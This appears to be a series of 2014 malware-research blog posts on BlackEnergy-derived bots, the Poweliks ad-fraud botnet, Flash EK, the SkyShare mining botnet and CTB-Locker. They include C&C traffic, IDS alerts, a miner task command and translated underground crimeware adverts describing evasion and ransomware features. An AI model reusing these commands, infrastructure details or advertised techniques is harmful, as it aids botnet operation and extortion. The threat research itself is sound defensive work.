BotnetKernel (MS:Win32/Phdet.S) an evolution of BlackEnergy

June 21, 2014, 5:53 am

≫ Next: From Alureon/Wowliks to Poweliks botnet (distribution in Affiliate mode)

I didn't find any advert for what seems to be an evolution of the Ddos bot/botnet BlackEnergy : Microsoft:Backdoor:Win32/Phdet.S : BotnetKernel Bot.

Here is a C&C panel :

BotnetKernel C&C Panel : Control

BotnetKernel C&C Panel : Control - Stats by Countries

BotnetKernel C&C Panel : Control - Stats by Builds

BotnetKernel C&C Panel : Plugins

BotnetKernel C&C Panel : Plugins config : ddos

BotnetKernel C&C Panel : Plugins config : http

BotnetKernel C&C Panel : Plugins config : slow

BotnetKernel C&C Panel :bot list

BotnetKernel C&C Panel :bot list - Search (FR) - Cmd and Cfg on a bot

A sample (7626a97642e27b13d2d8a021661099f7) I met was pushed as a task inside an Andromeda (yes same Andromeda botnet that was pushing Neutrino bot)

Sandboxing it :

Force reboot captured by Cuckoo Sandbox

Dropped:
C:\WINDOWS\system32\drivers\nethost.sys - f4827d3fc17af67f390b59f5ed04622c
C:\WINDOWS\system32\DLL1.tmp

Traffic (pcap at the end) :

http://nav555asto.mcdir.ru/ya/getcfg.php	POST /ya/getcfg.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Host: nav555asto.mcdir.ru Content-Length: 101 Cache-Control: no-cache hyrf=ZcHUXPhRjZgrcaXeLjNBeXq7YXPCO+9rXBJeQ53QARj24lQoxyWAfjRknTKsWfo2eDIxWwz2Feb+IjnjkAEG88MaS4L01pSq
http://nav555asto.mcdir.ru/ya/getcfg.php	POST /ya/getcfg.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Host: nav555asto.mcdir.ru Content-Length: 118 Cache-Control: no-cache nslaf=a8Cdb/EG37VtEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php	POST /ya/getcfg.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Host: nav555asto.mcdir.ru Content-Length: 116 Cache-Control: no-cache zkn=a8Cdb/EKz65uEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==
http://nav555asto.mcdir.ru/ya/getcfg.php	POST /ya/getcfg.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Host: nav555asto.mcdir.ru Content-Length: 116 Cache-Control: no-cache oeh=a8Cdb/ER17VpEv6KJklCcgjNF3TJOpsTUhxYQ+mrDRqFkSk48SyGYW05kmWGWe1ldEEOE1/nRvKrfDSQoU4Mus0ZU4Lx3sf3L0LM0gyKQzYiQw==

which fire ET Pro rules in Suricata :

06/21/2014-03:45:49.765657 [] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1072 -> 91.194.254.180:80
06/21/2014-03:45:47.325018 [] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 91.194.254.180:80
06/21/2014-03:45:48.563590 [] [1:2807793:2] ETPRO TROJAN Win32/Rootkit.BlackEnergy.AG Checkin [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1071 -> 91.194.254.180:80

Files : Multiple BotnetKernel bot Sample. Pcap. Dropped Driver

Read more :
BlackEnergy Rootkit, Sort Of - 2014-06-13 - F-Secure
Nueva variante del rootkit Phdet.s de dificil deteciòn !!! - 2014-03-04 - SatInfo
MSRT December '12 - Phdet - 2012-12-11 - Scott Molenkamp - Microsoft
BlackEnergy Version 2 Analysis - 2010-03-10 - Joe Stewart - Dell Secureworks
Updated BlackEnergy DDos Botnet Kit - 2010-01-18 Dell
BlackEnergy DDoS Bot Analysis (PDF) - 2007-10 - Jose Nazario - Arbor.sert

↧

From Alureon/Wowliks to Poweliks botnet (distribution in Affiliate mode)

July 7, 2014, 12:46 pm

≫ Next: Bye Bye Flash EK ? (and Windigo group adapting)

≪ Previous: BotnetKernel (MS:Win32/Phdet.S) an evolution of BlackEnergy

At begining of February 2014 a sample pushed via Sweet Orange caught my attention :

Alureon(MS)/wowliks(Eset) pushed in Sweet Orange
2014-02-03

[OT]:
The same Sweet Orange thread operator (mean same account/actor on the Sweet Orange ) was also pushing Qadars ( e.g. d7c1414939dc0956445835cc67187868) and an Andromeda (e.g. f757d0ce1bfcca3111e9060a6823b936 - exolocity.info [**] /andro/image.php -> 5.10.69.232:80)
[/OT]

The sample ( 61bdea52b821c04cb65237c345d2b7dc ) later tagged Trojan:Win32/Alureon.GQ by Microsoft was showing affiliate ID : 427 (connection with advert on underground has not been made for now)

Call were like :
http://cc9966 .com/log?install|aid=427|version=1.5|id=e87ff15a-a56a-42f5-b69b-503c6d3bf908|os=5.1.2600_3.0_32
http://cc9966 .com/cmd?version=1.5&aid=427&id=e87ff15a-a56a-42f5-b69b-503c6d3bf908&os=5.1.2600_3.0_32
http://cc9966 .com/log?exist_2_c0000035|aid=427|version=1.5|id=e87ff15a-a56a-42f5-b69b-503c6d3bf908|os=5.1.2600_3.0_32

You can find its analysis by Malwr.com here.
Unpacked by Horgh here and another one here

Another example in may, other exploit kit, other domain, other affiliate id but same botnet instance :

2014-05-22 - Angler EK via BlackOS (formerly Tales of the North Iframer aka Cookie Bomb) compromission

Payload : 21b2767f6da96c7e32c00b864ec5f03c

wow.ini dropped in the VM

05/22/2014-16:13:35.041044 f5f5dc.com [**] /log?start|aid=103|version=1.5|id=f66896c4-a2e2-4bba-a564-6242c3f778a6|os=5.1.2600_2.0_32 [**] <useragent unknown> [**] <no referer> [**] GET [**] HTTP/1.0 [**] 200 [**] 0 bytes [**] 192.168.1.31:1066 -> 31.184.192.196:80

But lately the affiliate seems to spread something different.

(2014-06-30) in Magnitude :

Poweliks.A pushed in Magnitude

Payload : c42ff115afabb81a979b51b15621f088
Unpacked by Horgh here and dll uncompressed

First set of post infection calls have changed and are are like :

06/30/2014-05:22:20.148052 cd5c5c.com [**] /q [**] <useragent unknown> [**] <no referer> [**] POST [**] HTTP/1.0 [**] 200 [**] 0 bytes [**] 192.168.1.31:1066 -> 31.184.192.202:80

06/30/2014-05:22:23.244452 download.microsoft.com [**] /download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe [**] Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) [**] <no referer> [**] GET [**] HTTP/1.1 [**] 200 [**] 318224 bytes [**] 192.168.1.31:1069 -> 96.7.41.136:80

Note it's getting : Microsoft .Net Framework 2.0 SP1 (x86) and later KB968930 (incl. PowerShell 2.0 and require sp3 on windows XP btw)

Firing ET pro rules in Suricata :

06/30/2014-05:22:20.148052 [**] [1:2808248:2] ETPRO TROJAN Win32/Poweliks.A Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1066 -> 31.184.192.202:80

06/30/2014-05:22:20.840616 [**] [1:2000419:22] ET POLICY PE EXE or DLL Windows file download [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 96.7.41.136:80 -> 192.168.1.31:1069

06/30/2014-05:22:21.124879 [**] [1:2014520:6] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 96.7.41.136:80 -> 192.168.1.31:1069

Poweliks.A is a name given by Eset.

Wowliks and Poweliks are sharing a lot of piece of codes

Some code snippet comparison (courtesy of Horgh)

and have very similar call back to C&C :

Wowliks :
http://%s/log?%s|aid=%s|version=1.5|id=%s|os=%s_%s
Poweliks :
type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s

As we might expect Poweliks integrates some PowerShell scripts.

b64 chain in powershell scripts in Poweliks (leading to mpress compressed dll)
http://pastebin.com/REdC5nB6
http://pastebin.com/SP1nHsT5

Despite slightly more complete network calls for poweliks it does not look like an evolution but more a downgraded fork... It's less resilient, does not have x64 components. Hard to understand such a move.

Now here is a look at the C&C side (February/March 2014) :

Botnet Size (around 30k active nodes) and daily new bots for a week in February

Income for a Week in February (all Affiliates)
Not far from 60k

showing some AID

Showing version available in February

The operation on that Botnet seems to have start at beginning of November.
How much money did they make since that time ? At least 721k (it's not a speculation - only 14k 2 month ago and 12k previous month vs 244k in february with one feed provider).
Note :
They may have change account within the same Feed Provider or may have change Feed Provider and hence have made far more.

Where is (was?) the feed/money coming from ?

IntecPPC.

Feed provider for this AdFraud botnet

Feed information

so money should come from this bank account (in February - data you get when you register there):

Beneficiary: Loyal Bank Limited

Beneficiary Account: RO81FNNB009502959442US01 USD

Beneficiary Bank: Credit Europe Bank (Romania) SA

Beneficiary Bank SWIFT: FNNBROBU

Bank Address: Bucharest, Romania

Beneficiary Address: Cedar Hill Crest, Villa, St. Vincent and the Grenadines

Payment details: In f/o Beneficiary Acc.no. 104011281407840 to the Beneficiary Name IntecPPC Ltd. and address Suite 101, 1885 Driftwood bay, Belize city, Belize. Payment for clicks on advertisements(traffic)

- our company name IntecPPC Ltd. (with "." in the end)

- our company address: Suite 101, 1885 Driftwood bay, Belize city, Belize

In june 2013 account for intecppc was :

All further payments should be sent to the following wire details:

Beneficiary: IntecPPC Ltd.

Beneficiary Account: 104011281407840 USD

Beneficiary Bank: Loyal Bank Limited

Beneficiary Bank SWIFT: LOYAVCVX

Bank Address:

Cedar Hill Crest, Villa, St. Vincent and the Grenadines

Beneficiary Address:

Suite 305, Marina Towers, Newtown Barracks,

Belize city, Belize

Streeview for

Marina Towers, Newtown Barracks,

Belize city, Belize

Note : Maybe IntecPPC is abused, and end customers of their advertisers here are victims...or maybe let's think darker, this is a complex money laundering scheme.
There is a "bot activity" detection implemented but less than 0.1% of the botnet traffic was flagged that way.

Credits: Thanks a lot Horgh for the time spent dissecting those samples.
Files : Fiddler/Pcap and some samples.

↧

Bye Bye Flash EK ? (and Windigo group adapting)

July 10, 2014, 6:51 am

≫ Next: SkyShare : Evolution Mining Botnet System

≪ Previous: From Alureon/Wowliks to Poweliks botnet (distribution in Affiliate mode)

Some days ago researchers following closely the exploit kit landscape started to notice some problem on Flash EK (afaik first noticed by Will Metcalf from Emerging Threats)

Few days after on underground one of the two customers posted a message to get some news....

Now the main customer (Windigo/Glupteba/ExTKR) has transitionned to RIG.

Here is an image to sum this up:

The Windigo/Ebury group reacting to Flash EK problems and push Glupteba in RIG
(after migrating from Neutrino - 2014-03- and previously from Blackhole - 2013-10)
Note : For those following Flash EK "codex" should sound Familiar :)

Flash EK (aka Flash Pack) was a fork or son of SafePack itself forked or son of CritXPack (formerly : Vintage Pack) (<-- yes, if you stop following the move...then you get lost).

Here is the advert for Flash EK :

Original advert - 2013-12-19
------------------------------------------
Предложение в первую очередь подойдет тем, кто дорожит своими источниками трафа.

В дополнение к этой теме
Появилась возможность выдавать связку в формирующийся баннером фрейм.
Связка тестилась и дорабатывалась в течение долгого времени.
В составе связки шесть сплоитов:
- 3 джавы до 1.7.21 включительно
- ледибойе
- дашстайл
- сильвер
В админке предусмотрена возможность автоматической смены доменов, чек домена и файла на палевность, загрузка файла по крону.
Траф принимается только после баннера, но лимитов нет.
Баннер:
- отфильтровывает непробиваемые оси и браузеры
- ставит флешкуку на сутки, если кука уже есть - фильтр, если не ставится - бот
- фильтрует по разрешению монитора
Все остальное попадает на связку.
Пока что связка грузит только exe, работы с dll ведутся.
Стоимость одного баннера с неограниченным количеством трафа на один поток с возможностью загрузки одного файла - 250 уев в неделю.
Оплата - битками по курсу.
Стоимость чисток баннера входит в стоимость аренды.
Тест - баннер за 25 уе под одну панель на сутки.
СНГ траф отправляется на дисней.

Жаба: confessor@sj.ms
Контакт саппорта - через жабу.
ОТР и ссылка на профиль в эксплоите обязательны.
Олбанский, английский и гугл-транслятор по-прежнему не понимаю.

PS: Возможна работа за процент от трафа, 10 процентов, объемы от 100 килограмм в сутки
------------------------------------------
Google translates this as:
------------------------------------------
Offer primarily for those who cherish their sources cores.

In addition to this topic
Now you can give a bunch of emerging banner frame.
Ligament tests and been refined over time.
As part of a bunch of six sploitov:
- 3 Jawas to 1.7.21 inclusive
- lediboye
- dashstayl
- Silver
In the admin provides the ability to automatically change the domain, and check domain file on palevnost, downloading a file to the crown.
Cores taken only after the banner, but no limits.
banner:
- Filters impenetrable axis and Browsers
- Puts fleshkuku per day, if the cookie is already there - the filter if not put - bot
- By the resolution of the monitor
Everything else goes to a bunch.
So far, only a bunch of ship exe, dll work in progress.
The price of one banner with an unlimited number of cores on a single stream with the ability to download a file - 250 uev week.
Payment - chock Exchange.
Cost cleansing banner included in the rent.
Test - banner for 25 ye a single panel on the day.
CIS cores goes to disney.

Toad: confessor@sj.ms
Contact tech support - through toad.
OTR and link to a profile in the exploit required.
Albany, English and Google-translator still do not understand.

PS: Can work for a percentage of the cores, 10 percent of the volume of 100 pounds per day
------------------------------------------

Update on march :
------------------------------------------
Появилась возможность взять еще пять-десять арендаторов на связку.
Слив через баннер - желательно, но не обязательно, прикручен стандартный ротатор.
Семь сплоитов. Нелепые вопросы про ЦВЕ игнорируются.
Траф - анлим, потоков - пять.
Чек файла и актуального домена из админки.
Один поток - 250 неделя, пять - 750.
Для теста нужен проксирующий впс на nginx и свои домены.
Если не знаете, что такое nginx или что такое домены - не стучите.
Траф из СНГ не принимается.
Детали - в жабе. Только ОТР.
Саппорт закодированный, групповуху на 400 мест не планируем. Пробив на достойном уровне. Чистки регулярные.
Всегда есть подработка для джава-кодеров.
По-английски не понимаю. Со школьниками не общаюсь. Оставляю за собой право отказаться от сотрудничества по субъективным причинам.
---Later
2014-0322
2013-0074
2013-0634
2013-2551
2013-2471
2013-2465
2011-3544
------------------------------------------
Google translated :
------------------------------------------
Now you can take another five to ten tenants bunch.
Draining through banner - preferably, but not necessarily, bolted standard rotator.
Seven sploitov. Ridiculous questions about CEE ignored.
Traf - anlim, streams - five.
Check the file and the actual domain of the admin.
One thread - 250 a week, five - 750.
Need to test a proxy UPU nginx and their domains.
If you do not know what nginx or what domains - do not knock.
Cores from the CIS is not accepted.
Details - in the toad. Only OTP.
A support coded, Group 400 seats do not plan to. Breaking at a decent level. Regular cleaning.
There is always a part for java coders.
In English do not understand. With students do not communicate. I reserve the right to refuse to cooperate for subjective reasons
---Later
2014-0322
2013-0074
2013-0634
2013-2551
2013-2471
2013-2465
2011-3544
------------------------------------------

Recent move :

Flash Pack is exploiting CVE-2014-0322 http://t.co/cLnWsRFtfw pic.twitter.com/4WxKtY4wRb
— kafeine (@kafeine) March 27, 2014

Flask Pack is now targeting CVE-2014-0497. Post Updated : http://t.co/m9m88Z5tb8 pic.twitter.com/dD9Zfc5jSB
— kafeine (@kafeine) April 16, 2014

CVE-2014-0515 integrating Exploit Kit (CottonCastle and Flash EK) http://t.co/IY32oCKkTZ cc/thx @malware_traffic pic.twitter.com/3FEdeNEEIM
— kafeine (@kafeine) June 7, 2014

Flash EK : more randomness pic.twitter.com/pVU2yPXVik
— kafeine (@kafeine) June 16, 2014

How was the panel ?

Flash EK - 2014-05-26

Another one to show the Refer and country part when activated :

Flash EK 2014-04-16

So..some think Paunch and Conf are now talking together about the old good time...maybe we'll hear about it...he'll come back or Conf will disappear without drums as Xio (Sakura) , Serv2u (Neutrino) did...
(I have to admit it again. I know it's bad but each time an EK disappear I feel a little Sad...).
--Edit1 2014-07-11 --
Conf replied on Underground :

Залил клаву на ноуте
Вот и вся проблема

(translation soon. Seems to be tied to a laptop problem)
------

Read More :
Operation Windigo (PDF) - 2014-03 - Eset
Meet Safe Pack (v2.0)... Again :) - 2013-04-21
Meet CritXPack (Previously Vintage Pack) - 2012-11-12

↧

SkyShare : Evolution Mining Botnet System

July 15, 2014, 12:19 pm

≫ Next: "Crypto Ransomware" CTB-Locker (Critroni.A) on the rise

≪ Previous: Bye Bye Flash EK ? (and Windigo group adapting)

At begining of the year, an advert for a mining botnet appeared on underground :

Piece of the Advert on the Underground

Original text of the Advert :
------------------------------------------
Предлагаю стабильную автоматическую систему по майнингу на ботах.
Краткое описание - это полноценная система «под ключ» для долгосрочного и стабильного майнинга.
Поддерживаемые валюты: quark ( рекомендовано ) / scrypt.

Основной функционал:

Drop-system - майнер автоматически устанавливается на зараженную машину сразу после прогруза лоадера (размер - всего 13кб)

Panel - удобная панель по контролю за ботами, вы можете смотреть статистики, курсы валют коинов, прогружать на боты сторонний софт и многое другое. Помимо базовых функций в панель включен стиллер и формграббер, для получения максимального дохода с ботов.

AutoPool - каждому клиенту мы предоставляем удобную панель для майнинга валют на наших пуллах,с возможностью переключения мощностей на самую выгодную в любой момент! Только для кварковых валют: qrk,src,frq,fz,c-note,wiki ( список будет дополнятся, в зависимости появления новых валют на биржах)

Данное обновление решает следующие проблемы:
1) потерю дохода из-за падения курса / увеличения сложностей
2) бан панели управления ботами (лоадером), когда теряется возможность контроля ботов
3) недоступность пулла / бан на пуллах

CPUMaxProfit - вырабатываем quark! Теперь вы получаете максимальный профит с каждого бота, не теряя стабильности заработка! Наш софт поддерживает все доступные виды quark валют, торгующихся на рынке : qrk, src, frq, fz, c-note и wikicoin!

Поддерживаются все версии windows - если раньше quark невозможно было выработать на версиях windows, ниже Windows 7, то теперь это возможно! Работа гарантированна на любой разрядности, будь то 32 или 64бит, а так же на любой конфигурации компьютера! При том, если раньше существенно снижался доход с 32битных машинок, то теперь эта разница минимальна!

Anti-av system - в майнере имеется функция автовосстановления в системе после удаления, в 7 из 10 случаев удаления майнера антивирусником / руками после перезагрузки он будет восстановлен в системе и продолжит свою работу!

Так же при выдаче билд майнера палится минимальным количеством антивирусов, большинство из которых непопулярны. Над усовершенствование фуд’а ведется активная работа. Майнер легко криптуется, при надобности дадим контакты криптосервисов,где вы можете получить скидку при крипте нашего продукта ( работают практически 24/7 )
Включен обход UAC!

Mining Community - для владельцев нашего майнера предоставляем доступ к сообществу, где обсуждаются все последние новости по софту, а так же имеется возможность предложить свою идею по развитию проекта.

Стабильность - за последние 3 месяца работы мы потеряли не более 10% скорости от общего числа производимых коинов и могу смело сказать, что майнеры живут месяцами (а может и годамиsmile.gif

Абузоустойчивость - каждая система располагается на мощнейшем серверном оборудовании, способном выдержать сотни тысяч ботов. К прокси / лоадеру привязаны абузоустойчивые домены, а сверху на систему наложено проксирование посредством технологии FastFlux, благодаря ей вы можете не боятся за свою безопасность во время работы с системой!

Поддерживаемые коины - наш бот поддерживает любые коины на алгоритмах quark / scrypt ( litecoin, dogecoin, securecoin и другие ). В данный момент система направлена на выработку именно quark коинов. Почему именно их? Читаем ниже в faq. Но если вы хотите майнить скриптовые коины - не проблема, все отличие только в том, что автопулл под них пока что не разрабатываем и вам надо будет выбрать пулл , куда будете майнить (Или саппорт подскажет актуальный пулл под вашу валюту).

Ценовая политика:
Только абонементная работа ( ввиду сложности системы ):

750$ первый месяц работы, 400$ последующие.

В цену включено: 2 панели (лоадера и майнера), exe дроппера, а так же exe майнеров и постоянные обновления.

Частые акции и скидки от нас и наших партнеров!

Оплата любым удобным вам видом валюты -от W1, Yandex Money, WM, Perfect, QIWI и до любого актуального криптокоина!

Популярные вопросы и ответы на них:

- А через гаранта работает?
- Работаем.

- Почему в аренду?
- Потому что система требует тонкой настройки и наш сервер тончайшим образом настроен под данную связку, так же мы не одобряем сливы в паблик.

- Криптовать надо постоянно?
- Лоадер - если хотите что бы боты провисели дольше, то да, следует регулярно обновлять крипт на ботах (таск update по текущим ботам), майнеры криптовать только перед прогрузом, далее они работают независимо от дроппера.

- Сколько живут майнеры в системах?
- Месяцами.

- Вы грузите?
- Сейчас - нет, как начнем - объявим обязательно. Для майнинга подойдет любой микс, будь то снг, азия, европа или сша.

- А почему кварк? Алгоритм малопопулярен и курсы низкие!
- Этому выбору есть несколько причин:
1) Сложность практически не изменяется, таким образом вы будете получать столько же коинов,сколько и получали во все время работы.
2) Алгоритм оптимизирован на работу цпу, таким образом асики не выйдут и курсы/ сложности не обвалятся, как это в данный момент происходит со скриптовыми валютами
3) Майнинг возможен на абсолютно любой конфигурации машины.
4) Произведена глубокая оптимизация, и сейчас сервера с пуллами выдерживают огромные скорости со стороны ботнетов, а так же возможно быстрое расширение парка, для поглощения максимальной доли вырабатываемых коинов из общей сети.
5) Касательно курсов обмена - над этим ведется работа, в течении месяца представим вам кое-что крутое wink.gif

- А сколько выдержат ваши пуллы? У меня парк из 100к ботов!
- И 100к выдержат,и в разы больше. Предоставляем несколько потоков для удобного менеджмента ваших скоростей.

- А я не хочу майнить кварк, хочу майнить дог или лайт или любой другой скриптовый коин!
- Без проблем, как делали, так и будем поддерживать скриптовую версию майнера, но автопулл под него делать не планируем и пуллы поднимать так же.

По всем вопросам писать в наш саппорт:
jid: ph0enix@armada.im
icq: 498758324

По вопросам технического характера, для владельцев майнера , писать на jid: xiii@armada.im
------------------------------------------
Google Translated as :
------------------------------------------
Suggest a stable automatic system for Mining on boats.
Short description - a complete system of "turnkey" for long-term and stable Mining.
Supported currencies: quark (recommended) / scrypt.

The main features:

Drop-system - a miner is automatically installed on the victim machine immediately after progruz loader (size - only 13KB)

Panel - convenient control panel to control the bot, you can watch statistics, exchange rates Coin, progruzhat bots on the third party software and more. Besides the basic functions in the panel included Stiller and formgrabber, maximizing proceeds with bots.

AutoPool - every client we provide convenient panel for mining rates on our pool products with the possibility of switching capacity on the best at any moment! Only for the quark exchange: qrk, src, frq, fz, c-note, wiki (a list will be supplemented, depending on the appearance of new currency exchanges)

This update addresses the following issues:
1) loss of income due to depreciation / increasing complexities
2) ban bots control panel (the loader), when lost the ability to control bots
3) the unavailability of the pull / ban for Pullach

CPUMaxProfit - are working out quark! Now you get the maximum profit from each bot without losing the stability of earnings! Our software supports all available types of quark currencies traded in the market: qrk, src, frq, fz, c-note and wikicoin!

It supports all versions of windows - if earlier it was impossible to develop a quark versions on windows, under Windows 7, it is now possible! Work is guaranteed to any digit, whether 32 or 64bit, as well as on any computer configuration! Though, if earlier significantly decreased income from 32 bit machines, but now the difference is minimal!

Anti-av system - a miner has AutoRecover in the system after the removal, in 7 of 10 cases of removal miner antivirusnikah / hands after reboot it will be restored in the system and will continue to work!

Just when issuing build miner palitsya minimum amount of antivirus, most of which are unpopular. Improvement over fud'a active work. Miner easily crypto, if necessary, give kriptoservisov contacts where you can get a discount at the crypt of our product (work almost 24/7)
Included bypass UAC!

Mining Community - for the owners of our miner provide access to the community, where we discuss all the latest news on a software as well as the possibility to propose his idea for the development project.

Stability - the last 3 months of work we have lost more than 10% of total rate produced a coin and I can safely say that the miners live for months (and maybe godamismile.gif

Bulletproof - each system is located on a powerful server hardware that can support hundreds of thousands of bots. By proxy / loader attached bulletproof domains, and on top of the system imposed by proxy technology FastFlux, thanks to her, you can not fear for their safety during the operation of the system!

Supported Coin - our bot supports any Coin on algorithms quark / scrypt (litecoin, dogecoin, securecoin and others). Currently the system is aimed at developing a quark Coin. Why them? Read below in the faq. But if you want to script Mein Coin - no problem, all the only difference is that under avtopull them yet do not develop and you will have to select a pull, which will Maini (Or tell a support under the actual pull your currency).

Pricing policy:
The subscription only work (due to the complexity of the system):

$ 750 first month, $ 400 the next.

Price includes: 2 panels (loader and miner), exe dropper, as well as exe miners and constant updates.

Frequent promotions and discounts from us and our partners!

Pay any way you view currency - from W1, Yandex Money, WM, Perfect, QIWI prior to any actual kriptokoina!

Popular questions and answers:

- A guarantor through work?
- Working.

- Why rent?
- Because the system requires fine-tuning and our server is configured under the subtlest way this bunch, because we do not approve of public plums.

- Kriptovat must constantly?
- Loader - if you want that bots hung longer, then yes, you should regularly update the crypt on boats (TASK update on current bots), just before the miners kriptovat progruz, then they work regardless of dropper.

- How many miners live in the systems?
- A month.

- Do you ship?
- Now - no, we start - declare mandatory. Suitable for mining any mix, whether CIS, Asia, Europe or the United States.

- And why the quark? Malopopulyaren algorithm and low rates!
- This choice has several reasons:
1) Complexity is practically unchanged, so you'll get the same Coin how to obtain all the work.
2) The algorithm is optimized to work cpu so Asik will not leave and courses / complexity not cave in, as is currently happening with scripted currencies
3) Mining is possible on any machine configuration.
4) Produced deep optimization, and now server Pulliam kept tremendous speeds by botnets, as well as possible the rapid expansion of the park, to absorb the maximum share of the total produced Coin network.
5) Regarding the exchange rates - on this work is being done within a month will introduce you to something cool wink.gif

- And how many will survive your Pulliam? I have a fleet of 100k bots!
- And 100k survive, and many times more. Provide multiple threads for easy management of your speed.

- I do not want Mein quark want Mein dog or light or any other scripting a coin!
- No problem, as we did, and we will support scripting version miner, but avtopull under it and do not plan to raise Pulliam as well.

On all questions write to our support:
jid: ph0enix@armada.im
icq: 498758324

For questions of a technical nature, for owners miner writing on jid: xiii@armada.im
------------------------------------------

Thanks again to an Independant researcher from Russia who shared some referer driving to what looks like a TDS I face a new for me infection chain.

3 tds call then Nuclear Pack pushing 2 samples

The .ok call was triggered on mouse move :

killbot function in the redirector
Not sure how much bot would be stopped by this...

Two Payloads :

a40db0fb9bfaf25dfddcd1aaf068d133 (Tofsee) and 9d82ce5c093390003a0f8b976610e479 ( an Andromeda)

Here are some request from that Andromeda :

http://yaybit.net/0x0x/image.php	POST /0x0x/image.php HTTP/1.1 Host: yaybit.net User-Agent: Mozilla/4.0 Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close

And the ET open rules fired in Suricata :

06/24/2014-01:45:07.423116 [] [1:2404163:3496] ET CNC Zeus Tracker Reported CnC Server group 14 [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80
06/24/2014-01:45:07.877385 [] [1:2003492:16] ET MALWARE Suspicious Mozilla User-Agent - Likely Fake (Mozilla/4.0) [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80
06/24/2014-01:45:08.566311 [] [1:2016223:8] ET TROJAN Andromeda Checkin [] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.1.31:1070 -> 37.187.131.39:80

A look at the C&C:

Binary don't lie :) We have an andromeda 2.06 Forked Panel
surely based on the leaked version.
2014-06-24 - 57k bots

Meaningfull Background :)

Sky Share version (bottom right of the Panel)

The botnet was growing really fast. 57k in one week. Then 1 week of rest and a jump in 1 day to 72k total (including dead one) bots.

2014-07-01 - 72k bots

Geo repartition :

That Sky Share geo repartition - 2014-06-24

Tasks List (the miner)

8d07b2d0062bfc7e4c7b8052e0a17646 (32) and cc560f5a630ee48365517125c173a94d (64)

minerd.exe -a scrypt -o stratum+tcp://zerofloor.net:16166 -u 16166 -p x

In the stats it's just the current values of main crypto currencies

The stealer part was not operationnal on that one but here is how it looks.

The andromeda form grabber :

RU/UA focused RegExp

Someone was selling this kind of setup on underground :

------------------------------------------
Лодер на базе андромеды прогружает ехе майнера.
В наличии ботнет 27к ботов (боты за ближайшие сутки 24часа).

Отдам всё что давали с лицензией: некриптованый файл лодера, два ехе майнеров(для 32 и 64 битных ос), стиллер-граббер пассов из браузера+грабер кошелей биткоин, доступ на лодер+стата активных майнеров (лодер хотится на FastFlex овнерами майнера - не надо парится за абузы и хостинг) .
Лицензия+не_хилый_парк_ботов= 2300$.

СРОЧНО, пишите в ПМ контакт кому надо.

Причина продажи: срочно нужны деньги.
------------------------------------------
Loder based Andromeda progruzhat exe miner.
Available 27k botnet bots (bots for the next day 24hours).

I will give all that gave license: nekriptovany file Loder, two miners exe (for 32 and 64 bit OS), Stiller grabber passes from browser + Graber Koshelev Bitcoin, access to Loder + become active miners (Loder hotitsya on FastFlex ovnerami miner - not need for steamed abuzy and hosting).
License + ne_hilyy_park_botov = $ 2300.

URGENT, write to the PM who should be contacted.

Reason for sale: need money urgently.
------------------------------------------

Author did not reply to questions about the incomes...but we can guess those were not that huge.

So. Bummer. Andromeda and a stratum coin miner. I like that post as less as i liked the "Silence Exploit Kit" one.

Fiddler : NuclearPack_Andro_Tofsee_2014-06-24

↧

"Crypto Ransomware" CTB-Locker (Critroni.A) on the rise

July 18, 2014, 4:08 am

≫ Next: A ScarePakage variant is targeting more countries : impersonating Europol and AFP

≪ Previous: SkyShare : Evolution Mining Botnet System

Critroni.A

Advertised since middle of june on Underground, CTB-Locker (Curve-Tor-Bitcoin Locker) is flagged Critroni.A by Microsoft. It seems at second half of june it was mainly used against russians, now it seems more widely used.

Text of the Advert :
------------------------------------------
CTB-Locker, Криптолокер нового поколения

Достоинства:

• Стойкая криптография на основе эллиптических кривых. Расшифровать файлы без оплаты невозможно. Стойкость эквивалента RSA-3072, что превышает все аналоги. При этом скорость шифрования значительно выше.

• Все ключи одноразовые и внести их в базу нельзя. Ключи абсолютно случайны, коллизии невозможны. У аналогов ключи зашиты в локер или сервер, их можно собрать.

• Размещение сервера в onion-домене (TOR), закрыть домен по абузе нельзя, практически невозможно отследить владельца и отключить сервер.

• Связь с сервером только после шифрования всех файлов. Невозможен ранний детект по трафику, невозможно блокировать работу локера. Блокирование TOR мешает только оплате юзеру, а не программе. Аналоги соединяются на сервер до крипта и их можно блокировать.

• Оплата в BTC. Кошелек невозможно блокировать и изъять. Деньги на сервере не хранятся. Утрата сервера не приводит к потере денег.

